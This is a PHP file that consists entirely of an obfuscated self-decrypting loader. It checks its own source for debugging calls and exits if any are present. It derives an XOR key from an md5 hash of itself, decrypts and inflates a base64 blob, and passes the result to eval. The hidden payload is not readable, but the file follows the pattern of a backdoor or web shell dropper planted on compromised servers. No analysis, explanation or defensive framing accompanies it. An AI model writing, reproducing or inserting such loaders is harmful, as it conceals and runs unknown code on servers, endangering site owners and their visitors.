<?php
$sqpwqdsdn="bd64ecbf4f1ffe57f4ad42f22d102f22";
$htbxyrv="5450050c5d55560705565704520357070505585450530557505108060454010b";
$ebpzijuo="I/hiMnh2JOHQm6rhrkOvLuNJm6RHyQpUuleUp82RzdbDmxgQ045xMYguyWCHsYI+UmBcVfHZ2Cxu7/hmoGr/OAn4Xu8P+l1rNVjvnOgamlCkAgUHKwY7mSjqLr0h";
$crkuuhu=file_get_contents(__FILE__);
$mccxotabvj=str_replace($ebpzijuo,"",$crkuuhu);
if(strpos($mccxotabvj,"ec"."ho")!==false||strpos($mccxotabvj,"pr"."int")!==false||strpos($mccxotabvj,"var_"."dump")!==false||strpos($mccxotabvj,"file_put_"."contents")!==false||strpos($mccxotabvj,"fw"."rite")!==false){die();}
$pamijhkkm=str_replace(array($sqpwqdsdn,$htbxyrv),array("SP_f906c1f2","KP_c92b3833"),$crkuuhu);
$fltzfynzj=md5($pamijhkkm);
$npoqjykjlgpy=hex2bin($htbxyrv);
$ncqikosadc="";
$okkajodpismt=strlen($fltzfynzj);
for($ydebyi=0;$ydebyi<$okkajodpismt;$ydebyi++){
    $ncqikosadc.=chr(ord($npoqjykjlgpy[$ydebyi])^ord($fltzfynzj[$ydebyi]));
}
$yivymmhpggj=base64_decode($ebpzijuo);
$jumzvtjar=strlen($yivymmhpggj);
$kotzgouuerln="";
$xmsfmhomp=strlen($ncqikosadc);
for($ydebyi=0;$ydebyi<$jumzvtjar;$ydebyi++){
    $kotzgouuerln.=$yivymmhpggj[$ydebyi]^$ncqikosadc[$ydebyi%$xmsfmhomp];
}
$vuhqmdgpx="gz"."in"."fl"."ate";
eval($vuhqmdgpx($kotzgouuerln));
